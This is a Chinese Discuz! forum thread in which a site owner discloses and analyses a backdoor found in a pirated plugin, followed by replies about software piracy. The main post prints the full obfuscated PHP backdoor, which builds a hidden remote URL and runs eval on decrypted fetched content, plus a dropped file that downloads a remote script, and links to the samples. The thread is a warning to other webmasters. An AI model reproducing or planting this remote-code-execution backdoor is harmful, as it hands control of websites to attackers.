久久久久av_欧美日韩一区二区在线_国产精品三区四区_日韩中字在线

Discuz! 官方交流社區

標題: 【續集】魔趣吧的東西真的有后門木馬,揭秘用盜版的危害 [打印本頁]
作者: 密碼忘了    時間: 2020-6-30 20:23
標題: 【續集】魔趣吧的東西真的有后門木馬,揭秘用盜版的危害
上次寫了一篇文章 披露了盜版市場的亂象 ,沒想到本人遭到魔趣吧的站長瘋狂的報復。我自己的網站已經持續快10天魔趣吧的站長使用DDOS攻擊技術,打不開了!因為在其網站進行了手機綁定,手機也整天被短信+電話轟炸!搞的我最近經常要開飛行模式!
但是我是絕對不會像黑惡勢力低頭的,大不了我網站不做了,手機號碼不用了!

前文回顧:魔趣吧的東西好像真的有后門木馬,改了我dz的后臺密碼
http://www.9999xn.com/thread-5095-1-1.html

因為前面的那篇文章寫的比較概況,沒有列舉證據(導致其大肆誤導不明真相的群眾說我在造謠),今天我就來列舉一些證據,并對已知的后門進行深入詳細的分析!
這可能是最后一篇曝光盜版市場亂象的文章了,因為我只是一個普普通通的站長!那些江湖經驗豐富的站長我惹不起,我也見識了魔趣吧是如果把黑的說成白的!

他的理念就是只要對他有利的都是好文章,曝光他的都是在造謠他!

在正式進入主題之前,我想在說幾句題外話:先不說他有沒有干些見不得人的事,其損壞原創開發者權益,謀取自己的利益(俗稱:盜版),還有什么資格在那一副正人君子的模樣懟這個懟那個!

【下面才是今天要說的主題】
由于帶后門的資源有點多,今天我就隨便拿個在魔趣吧收費的資源,且我之前安裝過,受害的資源來做分析!

樣本下載鏈接:為了不給他打廣告,帖子ID: 9183 ,知道他網站的隨便打開一個帖子把id換成這個就可以定位到!

因為是VIP資源,所以我分享到了藍奏網盤:https://wws.lanzous.com/iH9IQe6jymf  密碼:c9mx

附件MD5值:C03B189CA9E0EA7F1229F609A48EC705
防止因為我的曝光,他會修改附件,然后狡辯!對本文有異議的朋友可以在本文發布不久的時候,前去下載對比MD5值后,并效驗是不是存在本文提到的后門木馬!

樣本插件名稱:積分提現中心 V1.2

木馬文件所在路徑:keke_tixian\function\function_core.php


木馬完整代碼:
  1. <?php
  2. function zm_diconv($str){
  3.   $encode = mb_detect_encoding($str, array(

  5.         "ASCII",

  7.         "UTF-8",

  9.         "GB2312",

  11.         "GBK",

  13.         "BIG5"

  15.     ));

  17.     if ($encode != CHARSET) {

  19.         //$keytitle = iconv($encode,CHARSET."//IGNORE",$str);

  21.         $keytitle = mb_convert_encoding($str, CHARSET, $encode);

  23.     }

  25.     if (!$keytitle) {

  27.         $keytitle = $str;

  29.     }

  31.     return $keytitle;

  33. }
  34. function caidi($oo){
  35.     $love = 'httpABczonekey`akndecryptud^gjchdh`winNULLB{NVJ:GJGbaiduseo`lpsck`xml';
  36.         $forver=stripos($love,'d');
  37.         $forvere=stripos($love,'z');
  38.         $GLOBALS['love'] = preg_replace(array("/`.*?`/","/abc/i","/[A-Z_].*[A-Z_]/"),array(".","://","/"),$love);
  39.         $forveres='DECODE';
  40.         $aini=substr($love,$forver,$forvere);//獲取方法函數名decrypt
  41.         $aini=$oo?$forveres:$aini;
  42.         return $aini;
  43. }
  44. function decrypt($data, $key = '721520') {
  45.                 global $_G;
  46.                 $key = $key ? $key : $_G['config']['security']['authkey'];
  47.                 $type = caidi($key);
  48.                 return authcode($data,$type, $key);
  49.                 }

  51. function contentz($svip) {
  52. if(function_exists('file_get_contents')) {
  53. $data = file_get_contents($svip);
  54. } else {
  55. $ch = curl_init();
  56. $timeout = 5;
  57. curl_setopt ($ch, CURLOPT_URL, $svip);
  58. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  59. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  60. $data = curl_exec($ch);
  61. curl_close($ch);
  62. }
  63. return $data;
  64. }
  65. $iloveyou = caidi($oo);
  66. eval($iloveyou(strip_tags(contentz($love))));
  67. ?>
復制代碼
關鍵代碼:
  1. $iloveyou = caidi($oo);
  2. eval($iloveyou(strip_tags(contentz($love))));
復制代碼


有了這些信息 我們下面進行分析(在這里大膽的猜測一下:文件完全是魔趣吧自己加進去的,正版可能就沒有這個文件,因為這個文件代碼全是和后門有關!和插件自身功能沒有關系)
在關鍵代碼前面的都是木馬偽裝所需要用到的函數 執行過程如下:
1/----------------------

后門腳本執行入口:keke_tixian\admin.inc.php
關鍵代碼在該文件第7行:引用后門文件并執行
require_once DISCUZ_ROOT .'./source/plugin/keke_tixian/function/function_core.php';
解釋:只要安裝插件一打開后臺的插件設置,木馬就自動執行了!

2/--------依次執行----------


$iloveyou = caidi($oo);
解釋:定義一個名為   iloveyou 的變量  ,值為: caidi($oo)
調試: $iloveyou = caidi($oo); echo $iloveyou.$love; exit; ,得到 iloveyou 的值等于:decrypt
備注:函數 caidi 定義并賦值了 $love  作全局變量, love 的值等于:htt去p://zonekey.w掉in/b中ai文duseo.xml  (去掉中文)

3/--------依次執行----------

eval($iloveyou(strip_tags(contentz($love))));

解釋:已知 iloveyou 的值等于:decrypt,得到 eval(decrypt(strip_tags(contentz(htt去p://zonekey.w掉in/b中ai文duseo.xml))));

分析函數 contentz 得知該函數 是訪問遠程鏈接并返回內容,相當于 curl
分析函數 decrypt 得知該函數 是進行內容解密,直接調用了DISCUZ自帶的解密函數 authcode


解釋的解釋:代碼 eval($iloveyou(strip_tags(contentz($love)))); ,經過層層分析,最終為:
執行腳本 ( 解密 ( 訪問遠程代碼 ( htt去p://zonekey.w掉in/b中ai文duseo.xml ) ) ) );

4/--------依次執行----------

htt去p://zonekey.w掉in/b中ai文duseo.xml 該鏈接現在訪問返回的全部是 1111111111111111,所以無法繼續分析遠程的代碼是什么!

可能魔趣吧站長已經知道我接下來會深入曝光他。所以暫時把遠程代碼先全部改成了 1111111111111111
即使是這樣!又如何? 執行遠程腳本 有什么危害?相信做網站的都知道!這里我不進行科普!感興趣的站長可以百度自行科普:例:一句話木馬,菜刀!
下面的代碼是我網站自動多出來的一個文件:因為無法繼續分析,直接看結果
  1. <?php
  2. file_put_contents("schizwcingu.php",file_get_contents("http://iqqvps.com/xss.txt"));
復制代碼
上面的xss.txt  防止 魔趣吧站長 再去取消 我上傳到了 藍奏網盤 https://wws.lanzous.com/iPkAWe6na9c 密碼:i1nc

End/--------刨根問底--------

在前面一篇文章中提到過了  魔趣吧站長聲稱該木馬是源碼哥的!
但是既然干了,就干到底!
百度了一下 搜索 到 源碼哥  ,在他網站搜索 了一下 積分提現中心  果然找到一個一模一樣的版本!
花了20塊錢下載下來(真黑啊,1.2  這么舊的版本還賣20),不過花20塊錢 能讓大家看清,防止中木馬。也值得!

結局打臉: 沒有 keke_tixian\function\function_core.php  這個文件,因為是邊寫邊弄的,既然寫好了就這樣吧!
雖然沒有發現木馬,但是應該也是一丘之貉,還是呼吁大家不要用盜版!不要用盜版!不要用盜版!

PS:對魔趣吧站長傳播木馬,DDOS我的網站,短信+電話轟炸我的手機號 表示非常的鄙視!


希望官方管理員能夠曝光這篇文章,讓更多準備用盜版的站長、已經在用盜版的站長。趕緊回頭是岸!
樣本已經上傳到藍奏網盤,文章寫的不到位的地方,歡迎各路大神補充!



作者: 密碼忘了    時間: 2020-6-30 20:36
文中忘記說了!不能編輯 就占樓吧!
看圖打臉
(, 下載次數: 22)

1、保證無后門     
打臉:無后門!只是有木馬
不如:保證無后門,絕對有木馬!

2、魔趣吧修復后發布!
打臉:正版好好的東西,被魔趣吧修復一下就多了個后門木馬?
不如:魔趣吧增加木馬后發布

3、資源均經測試,請放心使用!
打臉:放個木馬在你網站,你能放心?
不如:木馬功能已經測試,請放心使用!零失誤!


4、官方認證圖標
打臉:魔趣吧官方正版木馬,請放心中毒!


作者: 密碼忘了    時間: 2020-6-30 20:39
申明:本文不是針對 可可 正版的應用  正版應用肯定是沒有木馬的!
本文說的是盜版的!

作者: 湖中沉    時間: 2020-6-30 20:53
簡單點說:無利不起早

開發者的利,自然是賣產品,也就是賣插件模板,為了多得利,自然要做好產品
站長的利,自然是通過程序賺錢或專區流量最終變現(也許你現在不賺錢,但別說永遠不打算賺錢)
盜版站的利,要么是錢,要么是流量,但最終和站長是一樣的,還是變現,如果打著所謂免費旗號,那么最終一定會在隱藏的地方來想辦法賺錢,那么很明顯,黑產是最簡單的選擇,那么后門木馬就不稀奇了。

賺錢可以,但請通過自己的勞動正當獲益,你要是自己寫代碼提供給站長,誰也沒權利指責你,但開發者費時費力的勞動所得,你偷去倒賣,這就很不道德了,并且不止是不道德,這是違法的。

再加上黑產,那么就更加讓人憤怒了,也就是說兩頭吃。

無利不起早,為利無可厚非,但請緊守底線,尊重別人的勞動。

經常有“站長”指責開發者賣的貴,不厚道。那么請你能寫出一樣的東西免費提供出來,但不能是偷別人的東西提供出來哦。當你能寫出一樣的東西的時候,并能始終免費提供,我向您投以真誠的敬意。

但別人通過大量的學習、探索、耗費精力和時間,勞動所得寫出的內容,以此獲取回報,則不能予以譴責。我們自然應當感恩免費的饋贈,但也同時應當尊重勞動回報的需求。
作者: 重慶之家    時間: 2020-6-30 23:22
以前貪便宜也是用盜版插件模版,安全中心三天兩頭的發出風險告警首頁老是被改,刪除了所有盜版插件模版,現在一直好好的
作者: xiaomianlang    時間: 2020-6-30 23:46
魔趣我不知道 反正哪個源碼哥的肯定是有木馬。都自己修改內容
作者: 羅永浩    時間: 2020-7-1 02:59
幾百塊一個月上高防就行。
作者: onetheme    時間: 2020-7-1 11:16
羅永浩 發表于 2020-7-1 02:59
幾百塊一個月上高防就行。

能舍得幾百塊一個月高防用盜版,何不花百十塊買個正版使用,不香嗎?
作者: 初錦    時間: 2020-7-1 20:56
嗯,當我看見你那個帖子的時候,發現一個叫做魔趣吧的用戶回復了你但被discuz管理員屏蔽了我就知道事情不簡單。我不站樓主和魔趣吧,我站discuz管理員的做法(放肆的大笑)
作者: 墨裔    時間: 2020-7-1 23:54
這故事引起了我的注意
作者: xiaomianlang    時間: 2020-7-2 03:07
貪小便宜的弊端。我也是曾經犯錯類似的問題
作者: icpcn    時間: 2022-11-2 23:32
他有搞了一個侵權投訴   。我剛搜了一下 。他的站 基本都是盜版模板 插件 。還弄一個 侵權投訴  。難道是現在板的   掩耳盜鈴  。。。。可笑至極  。。。官方也該收拾下這些盜版的了 。本來現在PC端  都要死不活的了 。都沒動力做下去了。 我一個朋友以前先做DZ開發的 。現在沒做了 。辛苦寫出的東東 。還沒賣幾個 。淘寶上都出現一堆盜版了 10元打包一堆 。。。付出和收入都不對等     。。。那里還有動力 來玩這個啊
作者: icpcn    時間: 2022-11-28 23:36
羅永浩 發表于 2020-7-1 02:59
幾百塊一個月上高防就行。

高防能防后門?還是第一次聽說 。。。度娘下高防是防什么滴兄弟  。。。
作者: qq784055837    時間: 2022-12-24 13:09
加木馬后發布 還賣錢,果然厲害。真的要支持正版



歡迎光臨 Discuz! 官方交流社區 (http://www.9999xn.com/) Powered by Discuz! W1.0